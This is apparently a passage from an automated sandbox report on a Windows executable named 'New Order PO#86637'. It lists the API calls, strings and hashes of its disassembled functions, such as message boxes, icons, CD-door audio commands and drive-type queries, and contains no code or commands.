                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                            • __swprintf.LIBCMT ref: 00460915
                                                                            • __swprintf.LIBCMT ref: 0046092D
                                                                            • _wprintf.LIBCMT ref: 004609E1
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 3631882475-2268648507
                                                                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                            • SendMessageW.USER32 ref: 00471740
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                            • SendMessageW.USER32 ref: 0047184F
                                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                            • String ID:
                                                                            • API String ID: 4116747274-0
                                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu$Sleep
                                                                            • String ID: 0
                                                                            • API String ID: 1196289194-4108050209
                                                                            • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                            • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                            • String ID: (
                                                                            • API String ID: 3300687185-3887548279
                                                                            • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                            • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                            APIs
                                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1976180769-4113822522
                                                                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                            • String ID:
                                                                            • API String ID: 461458858-0
                                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3969911579-0
                                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                            • String ID: 0
                                                                            • API String ID: 956284711-4108050209
                                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 1965227024-3771769585
                                                                            • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                            • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                            APIs
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove_wcslen
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 369157077-1007645807
                                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                            APIs
                                                                            • GetParent.USER32 ref: 00445BF8
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 3125838495-3381328864
                                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                            APIs
                                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 3052893215-2127371420
                                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
